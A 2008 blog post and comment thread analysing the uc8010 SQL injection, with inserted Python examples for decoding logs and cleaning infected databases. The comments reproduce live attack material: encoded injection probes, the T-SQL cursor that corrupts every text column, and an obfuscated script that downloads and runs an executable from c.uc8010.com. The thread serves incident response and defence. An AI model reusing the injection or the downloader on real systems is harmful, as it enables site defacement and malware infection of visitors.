uc8010 is an SQL injection attack

02 January 2008
original post: a plea for help

I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.

As far as I can tell, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.

For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.

07 January 2008
update on uc8010(dot)com

The exploit has been exposed and described (see the comments below; very, very informative, or go straight to the post-mortem). Below you can find out HOW they did it and WHAT it did. There is no magic fix. Worse, the injected UPDATE pushes every text value through convert(varchar, …) with no length, which SQL Server treats as varchar(30): each value is cut to 30 characters before the script tag is appended, so stripping the tag will not bring the lost text back and you will most likely have to restore your data from a backup. To prevent further attacks, stop building SQL by concatenating request values into the query: use parameterised queries, or at the very least validate and escape every value that arrives from the client (querystring, form fields, cookies and headers alike), and give the site's database login only the rights it needs, so that a stray query cannot read sysobjects or update every table.
Thanks very much to the guys who posted their findings here! Much appreciated.

The attack *is* malicious, and the potential payload is described here http://websmithrob.wordpress.com/ (or this http://isc.sans.org/diary.html?date=2008-01-04).

Also watch out for ucmal.com (122.224.146.246) which appears to be up to similar tricks.


33 thoughts on “uc8010 is an SQL injection attack”

  1. There’s no information available because of how new it is. The domain uc8010 has only been active since the 28th of December. I first ran into it on a site my company works with on the 30th. At that time, google was returning ~12,000 results.

    People adhering to the golden rules of DB/Web development would have been fine with this. Escape and filter everything coming from the client computer!

  2. Yes, I figured as much, any tips for fellow punters on how to stop this (in the short term) would be much appreciated. In the longer term I for one will certainly be following those golden rules. Do you for instance think there will be a patch issued by someone?

  3. No, there will not be a patch.

    When you think about it, there is nothing to ‘patch’. This is not a single software vulnerability, but instead a score of bad programming practices.

    My advice for the short term would be to run through all code involving client input, or input that can be modified at the client end (this includes forms and querystring variables) and ensure that it is sanitized. Strip HTML tags where they aren’t absolutely required, and escape absolutely everything going to the DB from those pages.

    I am currently in the process of examining server logs for an affected site, and am trying to pinpoint where the offensive code is originating from. This will help in deterring further problems from this source, but will do nothing against future attacks. The only long term solution is sound coding and testing practices…

    Best of luck to anyone involved, and feel free to contact me with any specific questions you may have.

  4. I found where this came from, and have cleaned up our data and found the door it was using. The easiest way to locate this from log entries is to look for EXEC(@S) or ;DECLARE. They ran this code about a dozen times in 3 days from the 28th – 30th.

  5. Sorry about all the mini-posts – I wanted to add that the post is a querystring post in our case and it contains the encoded string – 003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F006E002E007500630038003000310030002E0063006F006D002F0030002E006A0073003E003C002F007300630072006900700074003E
    which decodes to <script src=http://n.uc8010.com/0.js></script>

  6. It was the decode which was the script reference at the beginning of this thread.

    One more thing to note. My logs showed hits at:
    12/28 at 23:13 GMT
    12/29 at 20:12 GMT
    12/30 at 01:04 GMT

    I would be curious what others find and if they find another IP besides the one I did.

  7. I also found the IP you listed in my logs. (a quick way to find this info is to use the command prompt and the FIND command on your logfiles, this in a world without grep eh)

    My logs files also included:
    by=C%20ANd%20char(124)%2Buser%2Bchar(124)=0
    by=C%27%20ANd%20char(124)%2Buser%2Bchar(124)=0%20and%20%27%27=%27
    by=C%27%20ANd%20char(124)%2Buser%2Bchar(124)=0%20and%20%27%25%27=%27

    which i think decodes to

    by=C ANd char(124) user char(124)=0
    by=C' ANd char(124) user char(124)=0 and ''='
    by=C' ANd char(124) user char(124)=0 and '%'='

    the querystring “by=c”, was valid the rest is injected.

  8. Yes, I found those as well. There are also two attempts at the long command, the first is without the leading single quote and the second is with a leading single quote.

  9. Nice work guys.

    I would be curious to know whether these were requested via post from a form or not…?

    isaid – I know you said you’ve been a bit ‘relaxed’ about this stuff in the past, but it is interesting to see how much damage was caused and time wasted, when simply sanitizing your variable ‘by’ would have prevented it.

    Let this be a lesson to all!! Lol, again though… nice work sourcing it.

  10. 2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST([...]–|178|80040e14|Unclosed_quotation_mark_before_the_character_string_’G;DECLARE_@S_NVARCHAR(4000);SET_@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000′. – 202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) – 500 15248

  11. In my case, all three attacks were the same – 3 gets, trying to access sysadmin accounts, followed by 2 posts, one with the leading single quote, then one without.
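A decoder for the log fragments quoted in the comments above, as an added example that is not part of the original post or any commenter's code. It URL-decodes each request line with unquote (not unquote_plus, which would turn the %2B-encoded plus signs into spaces; in these probes the plus is T-SQL string concatenation, and char(124)+user+char(124)=0 makes SQL Server try to convert a string such as |dbo| to an integer so that the resulting error message discloses the database user), flags the ;DECLARE, EXEC(@S) and char(124) markers the commenters grepped for, and decodes any CAST(0x… AS NVARCHAR) literal as UTF-16. SQL Server stores NVARCHAR little-endian, as in the 0x4400450043… fragment in comment 10, while the hex pasted in comment 5 is written high byte first, so the byte order is sniffed from the first pair. The sample log lines are constructed from those fragments; the paths, timestamps and status codes are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines, assembled from the fragments quoted in the comments
# above. The paths, timestamps and status codes are assumptions; the querystring
# probe and the CAST payload are the ones the commenters posted (payload re-encoded
# low byte first, as SQL Server would actually receive it).
SAMPLE_LOG = [
    "2007-12-29 20:12:00 GET /list.asp by=C%27%20ANd%20char(124)%2Buser%2Bchar(124)=0%20and%20%27%27=%27 200",
    "2007-12-30 18:22:46 POST /page.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST("
    "0x3C0073006300720069007000740020007300720063003D0068007400740070003A002F002F006E002E"
    "007500630038003000310030002E0063006F006D002F0030002E006A0073003E003C002F0073006300720069007000740"
    "03E00%20AS%20NVARCHAR(4000));EXEC(@S);-- 500",
    "2007-12-30 18:30:01 GET /list.asp by=c 200",
]

# Strings the commenters found worth searching the logs for, compared case-insensitively.
PROBES = (';DECLARE', 'EXEC(@S)', 'CHAR(124)+USER+CHAR(124)')

# CAST(0x<hex> AS NVARCHAR(...)) or CAST(0x<hex> AS VARCHAR(...)); group 2 says which.
HEX_CAST = re.compile(r'CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR', re.IGNORECASE)


def decode_hex_payload(hexstr, nprefix='N'):
    """Decode a 0x... literal as SQL Server would when it is CAST to (N)VARCHAR.

    NVARCHAR is UTF-16 with two bytes per character, which is why every other
    byte of the logged payload is 00. The server reads it little-endian
    (0x4400 = 'D'); the transcription in comment 5 has the high byte first
    (0x003C = '<'), so sniff the order from the first byte pair.
    VARCHAR is single-byte and is decoded as latin-1 since no code page is known.
    """
    raw = bytes.fromhex(hexstr)
    if not nprefix:
        return raw.decode('latin-1')
    order = 'utf-16-be' if raw[:1] == b'\x00' and raw[1:2] != b'\x00' else 'utf-16-le'
    return raw.decode(order)


def analyse_line(line):
    """URL-decode one log line; report injection markers and any decoded payloads.

    unquote() rather than unquote_plus(): %2B must come back as a literal '+'
    (string concatenation in T-SQL), not as a space.
    """
    decoded = unquote(line)
    upper = decoded.upper()
    markers = [p for p in PROBES if p in upper]
    payloads = [decode_hex_payload(h, n) for h, n in HEX_CAST.findall(decoded)]
    return decoded, markers, payloads


def scan(lines):
    """Keep only the lines that carry a marker or a decodable payload."""
    return [hit for hit in map(analyse_line, lines) if hit[1] or hit[2]]


if __name__ == '__main__':
    for decoded, markers, payloads in scan(SAMPLE_LOG):
        print(decoded)
        print('  markers :', markers)
        for payload in payloads:
            print('  payload :', payload)
```

Run against real IIS logs, the same scan() shows the three-step pattern described in the comments: error-based probes on an unused parameter first, then the hex-wrapped cursor with and without the leading quote.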

  12. We got attacked by the same method at around the same time, someone in our team floated the idea that it was a method of doing a distributed DOS on the uc8010.com server by adding requests across thousands of high-traffic sites, but I guess if the domain has only been recently registered that’s probably a dead-end.

    The code in question was 5 years old and we’ve plugged it, but I’ve also installed WebKnight by Aqtronix http://www.aqtronix.com/?PageID=99 which guards against SQL Injection at the server level (it’s an ISAPI extension) for the moment – if anyone has any knowledge or feedback of this extension I’d be really grateful!

    My email address is email me some stuff at google mail dot com

    Cheers
    A

  13. I can show the content of the “0.js” file that is called by the injected script. As soon as a browser queries an infected table of your db the script redirects the browser and runs the following java code: [It seems to be harvesting cookies]
    ________________________________________

    // Stage 1: a "Lin" cookie marks a browser that has already been served the
    // extra content. Despite the variable name, the cookie lives 30 minutes
    // (the commented-out factor would have made it one day).
    function setCookie(name,value)
    {
    var Days = 1;
    var exp = new Date();
    exp.setTime(exp.getTime() + Days*30*60*1000);//Days*24*60*60*1000;
    document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
    }
    // First visit (no cookie yet): write two strings into the page (empty as
    // posted here), set the marker cookie and fall through to the eval below.
    // The cookie only gates the writeln calls; the eval runs on every visit.
    function getCookie(name)
    {
    var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
    if(arr != null)
    {
    return unescape(arr[2]);
    }
    else
    {
    document.writeln("");
    document.writeln("");
    setCookie("Lin","ok");
    return null;
    }
    }
    getCookie("Lin")

    // Stage 2: the octal escapes decode to two functions, gn() and
    // DownE(FileURL,LocalFile). DownE creates an <object> with classid
    // BD96C556-65A3-11D0-983A-00C04FC29E36 (the RDS.DataSpace control, the MDAC
    // hole fixed in MS06-014) and uses its CreateObject method to obtain
    // Microsoft.XMLHTTP, Adodb.Stream, Scripting.FileSystemObject and
    // Shell.Application. It fetches FileURL, saves the body under the Windows
    // folder as ~tmp.tmp + LocalFile and runs it with cmd.exe /c, swallowing any
    // error. The final statement is DownE("http://c.uc8010.com/rnmb/0/1.exe","19.exe").
    eval("\146\165\156\143\164\151\157\156\40\147\156\50\162\122\141\107\105\171\153\125\61\51\15\12\173\15\12\166\141\162\40\117\162\150\62\75\167\151\156\144\157\167\133\42\115\141\164\150\42\135\133\42\162\141\156\144\157\155\42\135\50\51\52\162\122\141\107\105\171\153\125\61\73\15\12\162\145\164\165\162\156\47\176\164\155\160\47\53\47\56\164\155\160\47\15\12\175\15\12\146\165\156\143\164\151\157\156\40\104\157\167\156\105\50\106\151\154\145\125\122\114\54\114\157\143\141\154\106\151\154\145\51\15\12\173\15\12\164\162\171\15\12\173\15\12\166\151\160\75\106\151\154\145\125\122\114\73\15\12\166\141\162\40\143\150\145\156\172\151\75\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\42\157\142\152\145\143\164\42\51\73\15\12\143\150\145\156\172\151\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\160\163\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\115\114\110\124\124\120\42\54\42\42\51\73\15\12\166\141\162\40\154\157\166\145\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\73\15\12\154\157\166\145\133\42\164\171\160\145\42\135\75\61\73\15\12\160\163\133\42\157\160\145\156\42\135\50\42\107\105\124\42\54\166\151\160\54\60\51\73\15\12\160\163\133\42\163\145\156\144\42\135\50\51\73\15\12\143\150\151\156\141\75\147\156\50\61\60\60\60\60\51\53\114\157\143\141\154\106\151\154\145\73\15\12\166\141\162\40\150\110\146\44\122\66\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\54\42\42\51\73\15\12\166\141\162\40\126\147\104\156\132\130\110\164\67\75\150\110\146\44\122\66\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\15\12\143\150\151\156\141\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\54\143\150\151\156\141\51\73\15\12\154\157\166\145\133\42\117\160\145\156\42\135\50\51\73\15\12\154\157\166\145\133\42\127\162\151\164\145\42\135\50\160\163\133\42\162\145\163\160\157\156\163\145\102\157\144\171\42\135\51\73\15\12\154\157\166\145\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\143\150\151\156\141\54\62\51\73\15\12\154\157\166\145\133\42\103\154\157\163\145\42\135\50\51\73\15\12\166\141\162\40\123\155\101\143\161\111\167\107\126\70\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\15\12\145\170\160\61\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\123\155\101\143\161\111\167\107\126\70\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\143\150\151\156\141\54\42\42\54\42\157\160\145\156\42\54\60\51\175\143\141\164\143\150\50\151\51\173\151\75\61\175\15\12\175\15\12\104\157\167\156\105\50\42\150\164\164\160\72\57\57\143\56\165\143\70\60\61\60\56\143\157\155\57\162\156\155\142\57\60\57\61\56\145\170\145\42\54\42\61\71\56\145\170\145\42\51\73")

  14. Here is the actual SQL that is being injected.

    DECLARE @T varchar(255),@C varchar(255)
    DECLARE Table_Cursor
    CURSOR FOR

    select
    a.name,b.name
    from
    sysobjects a,
    syscolumns b
    where
    a.id=b.id
    and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

    OPEN Table_Cursor
    FETCH NEXT FROM
    Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
    exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

    It will pull all text, ntext, nvarchar, and varchar fields for the DB and append the script tag to it. very easy to stop if you are not allowing selection against sysobjects.
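A port of the catalog walk in the comment above to Python and sqlite3, as an added example that is not part of the original post or the commenter's SQL. The attack's cursor read sysobjects and syscolumns on SQL Server; sqlite exposes the same information through sqlite_master and PRAGMA table_info, so the one loop over every text column is used here three ways: to replay the injected UPDATE against a constructed database (including the detail that convert(varchar, x) with no length is varchar(30) in SQL Server, so each value is truncated before the tag is appended), to report which columns carry the tag, and to strip it again. The table names and rows are constructed; the script URL is the one from the first post.

```python
import sqlite3

# Script tag from the first post (the hex payload in comment 5 decodes to it).
TAG = '<script src=http://n.uc8010.com/0.js></script>'


def text_columns(conn):
    """Every (table, column) pair whose declared type is character data.

    The real payload selected from sysobjects/syscolumns with xtype 35, 99, 167
    and 231 (text, ntext, varchar, nvarchar). sqlite keeps the same facts in
    sqlite_master and PRAGMA table_info, so the loop is the same shape.
    """
    pairs = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if any(k in (ctype or '').upper() for k in ('CHAR', 'TEXT', 'CLOB')):
                pairs.append((table, name))
    return pairs


def replay_attack(conn, tag=TAG):
    """Emulate exec('update [T] set [C]=rtrim(convert(varchar,[C]))+''<tag>''').

    convert(varchar, x) without a length is varchar(30) in SQL Server, so every
    value is cut to 30 characters before the tag goes on; NULLs stay NULL.
    """
    for table, col in text_columns(conn):
        conn.execute(f'UPDATE "{table}" SET "{col}" = rtrim(substr("{col}", 1, 30)) || ?', (tag,))
    conn.commit()


def find_infected(conn, marker='<script src=http://'):
    """Return {(table, column): affected_rows} for every column carrying the marker."""
    hits = {}
    for table, col in text_columns(conn):
        (n,) = conn.execute(
            f'SELECT count(*) FROM "{table}" WHERE instr("{col}", ?) > 0', (marker,)).fetchone()
        if n:
            hits[(table, col)] = n
    return hits


def strip_tag(conn, tag=TAG):
    """Remove the tag from every text column and return the number of rows changed.

    This undoes the append only; the 30-character truncation is not reversible.
    """
    changed = 0
    for table, col in text_columns(conn):
        cur = conn.execute(
            f'UPDATE "{table}" SET "{col}" = replace("{col}", ?, ?) WHERE instr("{col}", ?) > 0',
            (tag, '', tag))
        changed += cur.rowcount
    conn.commit()
    return changed


def demo():
    """Constructed data: one long text value, one short one, one non-text column."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title VARCHAR(255), body TEXT);
        CREATE TABLE products (sku VARCHAR(20), price REAL);
        INSERT INTO news VALUES (1, 'Short title', 'A body that is much longer than thirty characters in total.');
        INSERT INTO products VALUES ('ABC-1', 9.99);
    """)
    replay_attack(conn)
    before = find_infected(conn)
    strip_tag(conn)
    after = find_infected(conn)
    title, body = conn.execute('SELECT title, body FROM news').fetchone()
    (sku,) = conn.execute('SELECT sku FROM products').fetchone()
    return before, after, title, body, sku


if __name__ == '__main__':
    before, after, title, body, sku = demo()
    print('infected before cleanup:', before)
    print('infected after cleanup: ', after)
    print('recovered body:', repr(body))
```

Stripping the tag empties find_infected(), but the body column comes back cut to its first 30 characters, which is why restoring from backup is the only clean fix; the same sweep is useful as a read-only check after the restore and after each of the repeated runs the logs show.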

  15. I’m not sure I understand the actual injection: If it used a querystring variable (“by”) that’s not expected by a particular app (and presumably never compared/used later in code), how does it affect the given site?

  16. That’s the anomalous part: nowhere in our (hacked) site did we make use of any variable called “by”. If we never pulled off that part of the querystring, how’d they hit us? (We’ve since hardened all parts of the site, but we’d also like to stop things right from the start…)

  17. One thought: Is it possible that the actual attack worked with a library of possible querystring parameters (e.g. “name”, “ID”, all the letters of the alphabet, etc.) and simply tried its attack string on all of them?

  18. Ugh! Found it (thanks for the folks who pointed out the relevant log search strings). It looks like they simply crawled the site, then appended the attack on top of the parameters they found while doing so. From there, the attack tried various combinations of characters until it found one that got through our filters.

  19. pbickford: Yes, I think you are right, I had my suspicions it is an alphabet related attack, nothing wrong with using the alphabet per se, but once you see one it is a GOOD chance that this is going to be part of a dynamic SQL query, and ripe for attacking.

  20. yes good work guys I can confirm the above.

    by looking at the weblogs its done in the URL via SQL Injection as you say.

    What the above SQL does is iterate through every content table's text fields and append the harmful script to it.

    WHAT YOU DONT KNOW: NB! THE POINT!

    The uc8010 script is definitely malicious:
    it includes by means of iframes further scripts. You will find them if you look for them on the script's site. Amongst other arbitrary files (to throw off the investigator) a malicious javascript script is there and is executed on the client's browser that takes advantage of a flaw in the way Real Player is able to import media files with information embedded in them.

    This attack has been called EXPL_REALPLAY.H or RealPlayer Exploit and probably many other names.

    If the correct payload is inserted into the Real Player these instructions can actually execute on the client's computer – it is still uncertain as to what is possible here.

    So, the result of this was that when someone views the page containing the scripts from your corrupted database the script tag is hidden in each text and immediately causes the browser to download the malicious script, which then if the user has the correct version of Real Player attempts to cause a buffer overflow and execute an unknown set of machine code.
